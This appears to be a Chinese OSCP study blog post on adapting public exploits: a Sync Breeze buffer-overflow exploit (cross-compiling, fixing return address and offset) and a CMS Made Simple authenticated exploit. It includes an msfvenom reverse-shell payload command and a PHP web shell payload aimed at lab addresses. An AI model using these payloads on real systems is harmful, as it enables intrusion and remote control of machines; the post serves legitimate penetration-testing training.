

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://avatars.githubusercontent.com/u/62293120?v=4">
  <link rel="icon" href="https://avatars.githubusercontent.com/u/62293120?v=4">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="C47Sh4rk">
  <meta name="keywords" content="">
  
    <meta name="description" content="作为一个渗透测试人员, 修复代码的能力是必要的">
<meta property="og:type" content="article">
<meta property="og:title" content="修复EXP代码">
<meta property="og:url" content="https://c47sh4rk.github.io/2022/08/16/%E4%BF%AE%E5%A4%8DEXP%E4%BB%A3%E7%A0%81/index.html">
<meta property="og:site_name" content="C47Sh4rk&#39;s Blog">
<meta property="og:description" content="作为一个渗透测试人员, 修复代码的能力是必要的">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220816235000.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220816235330.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817004523.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817004940.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817005634.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817010001.png">
<meta property="article:published_time" content="2022-08-16T15:12:28.000Z">
<meta property="article:modified_time" content="2023-02-26T08:05:47.000Z">
<meta property="article:author" content="C47Sh4rk">
<meta property="article:tag" content="OSCP">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220816235000.png">
  
  
  
  <title>修复EXP代码 - C47Sh4rk&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"c47sh4rk.github.io","root":"/","version":"1.9.1","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>C47Sh4rk&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/0%20(2).png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="修复EXP代码"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-08-16 23:12" pubdate>
          2022年8月16日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          22 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">修复EXP代码</h1>
            
            <div class="markdown-body">
              
              <h3 id="修复EXP代码"><a href="#修复EXP代码" class="headerlink" title="修复EXP代码"></a>修复EXP代码</h3><ul>
<li>修复EXP代码是渗透测试人员的一种能力要求<ul>
<li>自己写EXP代码往往非常耗时, 和搜索一个符合当前环境的EXP同样困难、耗时</li>
</ul>
</li>
<li>公开的EXP往往只针对具体版本的系统和软件环境<ul>
<li>将其用于其他软件环境时可能造成崩溃、锁死目标主机</li>
</ul>
</li>
<li>针对同一漏洞, Exploit-DB可能存在多个EXp<ul>
<li>目的是适用于不同版本的软件环境</li>
</ul>
</li>
</ul>
<h2 id="修复内存污染EXP"><a href="#修复内存污染EXP" class="headerlink" title="修复内存污染EXP"></a>修复内存污染EXP</h2><h3 id="基本信息"><a href="#基本信息" class="headerlink" title="基本信息"></a>基本信息</h3><ul>
<li><p>缓冲区溢出EXP通常较难修改且复杂</p>
</li>
<li><p>没有 DEP 和 ASLR 等技术时流程相对清晰</p>
<ol>
<li>创建一个大缓冲区来触发溢出</li>
<li>通过用适当的偏移量填充大缓冲区来覆盖堆栈上的返回地址来控制 EIP</li>
<li>在缓冲区中注入Payload，并前置一个可选的 NOP sled。</li>
<li>选择正确的指令，例如 JMP ESP（或其他的寄存器），以便将执行流重定向到Payload。</li>
</ol>
</li>
<li><p>按照目标系统软件环境修改</p>
<ul>
<li>文件路径、IP地址、端口、URL、偏移量、返回地址、跳转指令(DLL)等</li>
<li>修改Palyoad(反弹IP、端口、坏字符), 部分情况下只能逆向分析</li>
</ul>
</li>
</ul>
<h3 id="检查EXP"><a href="#检查EXP" class="headerlink" title="检查EXP"></a>检查EXP</h3><ul>
<li>Sync Breeze另一个EXP, 搜索已知漏洞<ul>
<li><code>kali@kali:~$ searchsploit &quot;Sync Breeze Enterprise 10.0.28&quot;</code><br><img src="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220816235000.png" srcset="/img/loading.gif" lazyload></li>
<li>C语言版本EXP适用于没有python解释器的场景(PyInstaller)</li>
</ul>
</li>
<li>将EXP源码拷贝到当前目录<ul>
<li><code>kali@kali:~$ searchsploit -m 42341</code><br><img src="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220816235330.png" srcset="/img/loading.gif" lazyload></li>
</ul>
</li>
</ul>
<h3 id="跨平台编译"><a href="#跨平台编译" class="headerlink" title="跨平台编译"></a>跨平台编译</h3><ul>
<li>在考虑编译之前，我们注意到头文件（例如 winsock2.h381）表明此代码是要在 Windows 上编译的<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;inttypes.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;winsock2.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;windows.h&gt;</span></span><br></code></pre></td></tr></table></figure></li>
<li>交叉编译漏洞利用代码<ul>
<li>mingw-64 交叉编译器</li>
<li><code>kali@kali:~$ sudo apt install mingw-w64</code></li>
</ul>
</li>
<li>将源码编译为标准PE文件<ul>
<li><code>kali@kali:~$ i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe  # 报错</code></li>
<li><code>kali@kali:~$ i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32</code></li>
</ul>
</li>
</ul>
<h3 id="修正代码"><a href="#修正代码" class="headerlink" title="修正代码"></a>修正代码</h3><ul>
<li><p>修改硬编码Ip、端口</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[&gt;] Socket created.\n&quot;</span>);<br>server.sin_addr.s_addr = inet_addr(<span class="hljs-string">&quot;10.11.0.22&quot;</span>);<br>server.sin_family = AF_INET;<br>server.sin_port = htons(<span class="hljs-number">80</span>);<br></code></pre></td></tr></table></figure></li>
<li><p>修正返回地址</p>
<ul>
<li>对代码的进一步检查发现使用了位于 msvbvm60.dll 中的返回地址，该地址不是易受攻击的软件的一部分。查看 Windows 客户端调试器中加载的模块，我们注意到该 DLL 不存在，这意味着返回地址对我们的目标无效。</li>
<li>鉴于我们之前的模块已经有一个有效的漏洞利用，我们可以用我们自己的替换目标返回地址，这是有效的。</li>
<li><code>unsigned char retn[] = &quot;\x83\x0c\x09\x10&quot;; // 0x10090c83</code></li>
<li>或者可以搜索别人针对此漏洞已经发现的返回地址(其他系统、内存安全技术)</li>
</ul>
</li>
<li><p>生成并替换payload</p>
<ul>
<li><code>kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC= thread -f c –e x86/shikata_ga_nai -b &quot;\x00\x0a\x0d\x25\x26\x2b\3d&quot;</code></li>
</ul>
</li>
</ul>
<h3 id="编译"><a href="#编译" class="headerlink" title="编译"></a>编译</h3><ul>
<li><p>代码修正后编译</p>
<ul>
<li><code>kali@kali:~$ i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32</code></li>
</ul>
</li>
<li><p>执行exp(崩溃)</p>
<ul>
<li><code>kali@kali:~/Desktop$ wine exploit.exe</code></li>
</ul>
</li>
<li><p>分析EIP和缓冲区数据, 发现偏移量相差一个字节<br><img src="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817004523.png" srcset="/img/loading.gif" lazyload></p>
</li>
<li><p>调整偏移量</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> initial_buffer_size = <span class="hljs-number">781</span>;<br><span class="hljs-type">char</span> *padding = <span class="hljs-built_in">malloc</span>(initial_buffer_size);<br><span class="hljs-built_in">memset</span>(padding, <span class="hljs-number">0x41</span>, initial_buffer_size);<br><span class="hljs-built_in">memset</span>(padding + initial_buffer_size - <span class="hljs-number">1</span>, <span class="hljs-number">0x00</span>, <span class="hljs-number">1</span>);<br></code></pre></td></tr></table></figure></li>
</ul>
<ol>
<li>重新编译</li>
<li>开启侦听反弹连接</li>
<li>执行exp<br><img src="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817004940.png" srcset="/img/loading.gif" lazyload></li>
</ol>
<h2 id="WEB-EXP修复"><a href="#WEB-EXP修复" class="headerlink" title="WEB EXP修复"></a>WEB EXP修复</h2><h3 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h3><ul>
<li>WEB漏洞利用通常不会造成内存污染, 因此也不受内存保护机制影响</li>
<li>修改WEB EXP关注以下:<ol>
<li>协议位HTTP&#x2F;HTTPS</li>
<li>是否需要访问特定路径或路由</li>
<li>身份认证前是否可利用漏洞</li>
<li>若否, 使用何种身份认证方式</li>
<li>GET&#x2F;POST</li>
<li>是否依赖程序默认设置(可能默认配置被修改)</li>
<li>自签名证书等问题是否影响漏洞</li>
</ol>
</li>
</ul>
<h3 id="修复案例"><a href="#修复案例" class="headerlink" title="修复案例"></a>修复案例</h3><ul>
<li><p>假设</p>
<ul>
<li>发现 Linux + Apache + CMS Made Simple version 2.2.5 listening on TCP port 443.</li>
<li>搜索发现EXP代码44976.py(需要认证)</li>
<li>在其他主机商发现可用账号密码admin:Passw0rd</li>
</ul>
</li>
<li><p>修正URL</p>
<ul>
<li><code>base_url = &quot;http://192.168.1.10/cmsms/admin&quot;</code></li>
<li><code>base_url = &quot;https://10.11.0.128/admin&quot;</code></li>
</ul>
</li>
<li><p>修正默认账号密码<br><img src="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817005634.png" srcset="/img/loading.gif" lazyload></p>
</li>
<li><p>修正证书报错</p>
<ul>
<li><code>response = requests.post(url, data=data, cookies=cookies, allow_redirects=False, v erify=False)</code></li>
</ul>
</li>
<li><p>payload无需修改</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">php_filename = <span class="hljs-string">&#x27;shell.php&#x27;</span><br>payload = <span class="hljs-string">&quot;&lt;?php system($_GET[&#x27;cmd&#x27;]);?&gt;&quot;</span><br></code></pre></td></tr></table></figure></li>
<li><p>修复参数分割符</p>
<ul>
<li><code>https://10.11.0.128/admin?_sk_=f2946ad9afceb247864</code></li>
<li><code>csrf_param = &quot;_sk_&quot;</code></li>
</ul>
</li>
<li><p>执行EXP<br><img src="https://raw.githubusercontent.com/Neiiiiil/picgo_img/main/20220817010001.png" srcset="/img/loading.gif" lazyload></p>
</li>
</ul>

              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/OSCP-Notes/" class="category-chain-item">OSCP-Notes</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/OSCP/">#OSCP</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>修复EXP代码</div>
      <div>https://c47sh4rk.github.io/2022/08/16/修复EXP代码/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>C47Sh4rk</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年8月16日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/08/17/%E6%96%87%E4%BB%B6%E4%BC%A0%E8%BE%93/" title="文件传输">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">文件传输</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/08/16/%E6%90%9C%E7%B4%A2%E5%B7%B2%E7%9F%A5EXP/" title="搜索已知EXP">
                        <span class="hidden-mobile">搜索已知EXP</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>






  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
